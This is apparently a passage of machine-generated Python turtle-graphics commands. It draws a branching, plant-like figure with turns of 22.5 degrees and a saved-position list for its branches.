listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((184.15,194.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.15,194.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((184.15,194.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((184.15,194.13)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((195.46,205.44), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.46,205.44)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((195.46,205.44), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((195.46,205.44)), setheading(45.0) ;
pu(), setposition((153.37,188.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((170.80,214.10), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.80,214.10)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((170.80,214.10), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((170.80,214.10)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((185.59,220.22), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.59,220.22)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((185.59,220.22), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.59,220.22)), setheading(22.5) ;
pu(), setposition((153.37,188.00)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((169.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((169.37,188.00)), setheading(0.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((185.37,188.00)), setheading(0.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((196.68,176.69), 292.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.68,176.69)), setheading(292.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((196.68,176.69), 315.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((196.68,176.69)), setheading(315.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((211.46,170.57), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.46,170.57)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((211.46,170.57), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((211.46,170.57)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((227.46,170.57), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((227.46,170.57)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 337.5), ((227.46,170.57), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((227.46,170.57)), setheading(0.0) ;
pu(), setposition((185.37,188.00)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((200.15,194.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((200.15,194.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((216.15,194.13), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.15,194.13)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((216.15,194.13), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((216.15,194.13)), setheading(0.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((230.93,188.00), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.93,188.00)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((185.37,188.00), 0.0), ((230.93,188.00), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((230.93,188.00)), setheading(337.5) ;
pu(), setposition((185.37,188.00)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((200.15,194.13), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((200.15,194.13), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((200.15,194.13)), setheading(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.93,200.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((214.93,200.25)), setheading(22.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((229.71,194.13), 315.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.71,194.13)), setheading(315.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((229.71,194.13), 337.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((229.71,194.13)), setheading(337.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((245.71,194.13), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.71,194.13)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((245.71,194.13), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((245.71,194.13)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((260.49,200.25), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.49,200.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 0.0), ((260.49,200.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((260.49,200.25)), setheading(22.5) ;
pu(), setposition((214.93,200.25)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((226.24,211.56), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((226.24,211.56), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((241.03,217.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.03,217.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((241.03,217.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((241.03,217.69)), setheading(22.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((257.03,217.69), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.03,217.69)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((214.93,200.25), 22.5), ((257.03,217.69), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((257.03,217.69)), setheading(0.0) ;
pu(), setposition((214.93,200.25)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((226.24,211.56), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((226.24,211.56), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((226.24,211.56)), setheading(45.0) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.56,222.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((237.56,222.88)), setheading(45.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((253.56,222.88), 337.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((253.56,222.88)), setheading(337.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((253.56,222.88), 0.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((253.56,222.88)), setheading(0.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((268.34,229.00), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.34,229.00)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((268.34,229.00), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((268.34,229.00)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((279.65,240.31), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((279.65,240.31)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 22.5), ((279.65,240.31), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((279.65,240.31)), setheading(45.0) ;
pu(), setposition((237.56,222.88)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((243.68,237.66), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.68,237.66)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((243.68,237.66), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((243.68,237.66)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((254.99,248.97), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.99,248.97)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((254.99,248.97), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((254.99,248.97)), setheading(45.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((269.78,255.10), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((269.78,255.10)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 22.5), ((237.56,222.88), 45.0), ((269.78,255.10), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((269.78,255.10)), setheading(22.5) ;
pu(), setposition((237.56,222.88)), setheading(45.0) ;
pu(), setposition((153.37,188.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((159.49,202.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((159.49,202.79)), setheading(67.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,217.57)), setheading(67.5) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 0.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(0.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((180.39,223.69), 22.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((180.39,223.69)), setheading(22.5) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(22.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((191.71,235.00), 45.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((191.71,235.00)), setheading(45.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 45.0), ((197.83,249.79), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((197.83,249.79)), setheading(67.5) ;
pu(), setposition((165.61,217.57)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 67.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(67.5) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((165.61,233.57), 90.0)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((165.61,233.57)), setheading(90.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 45.0)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(45.0) ;
left(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((171.74,248.35), 67.5)] ;
left(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
right(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((171.74,248.35)), setheading(67.5) ;
right(22.5) ;
pd(), fd(8.0) ;
pd(), fd(8.0) ;
right(22.5) ;
listePositions = [((48.98,118.26), 45.0), ((153.37,188.00), 45.0), ((165.61,217.57), 67.5), ((183.05,259.66), 22.5)] ;
right(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
left(22.5) ;
pd(), fd(8.0) ;
pu(), setposition((183.05,259.66)), setheading(22.5) ;
left(22.5) ;
